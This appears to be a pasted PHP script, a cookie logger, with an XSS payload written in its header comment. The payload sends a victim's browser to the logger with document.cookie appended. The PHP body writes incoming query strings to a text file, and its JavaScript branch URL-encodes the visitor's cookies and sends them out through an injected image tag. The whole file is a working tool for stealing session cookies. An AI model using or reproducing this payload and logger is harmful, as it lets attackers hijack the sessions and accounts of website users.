SHOW:
|
|
- or go back to the newest paste.
1 | <?php | |
2 | /* | |
3 | * Created on 16. april. 2007 | |
4 | * Created by Audun Larsen (audun@munio.no) | |
5 | * | |
6 | * Copyright 2006 Munio IT, Audun Larsen | |
7 | * | |
8 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, | |
9 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS | |
10 | * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE | |
11 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES | |
12 | * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; | |
13 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
14 | * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, | |
15 | * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
16 | * | |
17 | * CookieLogger.php | |
18 | * CookieLog.txt | |
19 | * | |
20 | * PAYLOAD XSS | |
21 | * <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script> | |
22 | */ | |
23 | ||
24 | if(strlen($_SERVER['QUERY_STRING']) > 0) { | |
25 | $fp=fopen('./CookieLog.txt', 'a'); | |
26 | fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n"); | |
27 | fclose($fp); | |
28 | } else { | |
29 | ?> | |
30 | ||
31 | var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>'; | |
32 | ||
33 | // == | |
34 | // URLEncode and URLDecode functions | |
35 | // | |
36 | // Copyright Albion Research Ltd. 2002 | |
37 | // http://www.albionresearch.com/ | |
38 | // | |
39 | // You may copy these functions providing that | |
40 | // (a) you leave this copyright notice intact, and | |
41 | // (b) if you use these functions on a publicly accessible | |
42 | // web site you include a credit somewhere on the web site | |
43 | // with a link back to http://www.albionresearch.com/ | |
44 | // | |
45 | // If you find or fix any bugs, please let us know at albionresearch.com | |
46 | // | |
47 | // SpecialThanks to Neelesh Thakur for being the first to | |
48 | // report a bug in URLDecode() - now fixed 2003-02-19. | |
49 | // And thanks to everyone else who has provided comments and suggestions. | |
50 | // == | |
51 | function URLEncode(str) | |
52 | { | |
53 | // The Javascript escape and unescape functions do not correspond | |
54 | // with what browsers actually do... | |
55 | var SAFECHARS = "0123456789" + // Numeric | |
56 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic | |
57 | "abcdefghijklmnopqrstuvwxyz" + | |
58 | "-_.!~*'()"; // RFC2396 Mark characters | |
59 | var HEX = "0123456789ABCDEF"; | |
60 | ||
61 | var plaintext = str; | |
62 | var encoded = ""; | |
63 | for (var i = 0; i < plaintext.length; i++ ) { | |
64 | var ch = plaintext.charAt(i); | |
65 | if (ch == " ") { | |
66 | encoded += "+"; // x-www-urlencoded, rather than %20 | |
67 | } else if (SAFECHARS.indexOf(ch) != -1) { | |
68 | encoded += ch; | |
69 | } else { | |
70 | var charCode = ch.charCodeAt(0); | |
71 | if (charCode > 255) { | |
72 | alert( "Unicode Character '" | |
73 | + ch | |
74 | + "' cannot be encoded using standard URL encoding.\n" + | |
75 | "(URL encoding only supports 8-bit characters.)\n" + | |
76 | "A space (+) will be substituted." ); | |
77 | encoded += "+"; | |
78 | } else { | |
79 | encoded += "%"; | |
80 | encoded += HEX.charAt((charCode >> 4) & 0xF); | |
81 | encoded += HEX.charAt(charCode & 0xF); | |
82 | } | |
83 | } | |
84 | } // for | |
85 | ||
86 | return encoded; | |
87 | }; | |
88 | ||
89 | cookie = URLEncode(document.cookie); | |
90 | html = '<img src="'+ownUrl+'?'+cookie+'">'; | |
91 | document.write(html); | |
92 | ||
93 | < ?php | |
94 | } | |
95 | ?> |